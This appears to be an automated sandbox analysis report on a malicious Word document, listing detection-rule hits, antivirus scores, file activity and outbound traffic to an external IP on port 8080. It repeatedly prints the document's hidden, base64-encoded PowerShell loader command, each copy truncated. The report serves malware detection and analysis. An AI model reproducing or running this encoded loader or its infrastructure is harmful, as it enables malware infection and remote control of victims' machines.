    Sigma detected: Suspicious PowerShell CmdlineShow sources
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEo
    Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command LinesShow sources
    Source: Process startedAuthor: John Lambert (rule): Data: Command: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEo
    Sigma detected: Non Interactive PowerShellShow sources
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEo

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: attacker5.docVirustotal: Detection: 49%Perma Link
    Source: attacker5.docMetadefender: Detection: 40%Perma Link
    Source: attacker5.docReversingLabs: Detection: 45%
    Antivirus / Scanner detection for submitted sampleShow sources
    Source: attacker5.docAvira: detected
    Antivirus detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMPAvira: detection malicious, Label: HEUR/Macro.Downloader.YPA.Gen
    Machine Learning detection for sampleShow sources
    Source: attacker5.docJoe Sandbox ML: detected
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 176.103.56.89:8080
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 176.103.56.89:8080
    Source: unknownTCP traffic detected without corresponding DNS query: 176.103.56.89
    Source: unknownTCP traffic detected without corresponding DNS query: 176.103.56.89
    Source: unknownTCP traffic detected without corresponding DNS query: 176.103.56.89
    Source: powershell.exe, 00000002.00000002.418116880.0000000002360000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: powershell.exe, 00000002.00000002.418116880.0000000002360000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: powershell.exe, 00000002.00000002.417841377.0000000000393000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{48A7C03B-9CB7-46B2-8DC4-5DC849FD423A}.tmpJump to behavior

    E-Banking Fraud:

    barindex
    Malicious encrypted Powershell command line foundShow sources
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAz
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFE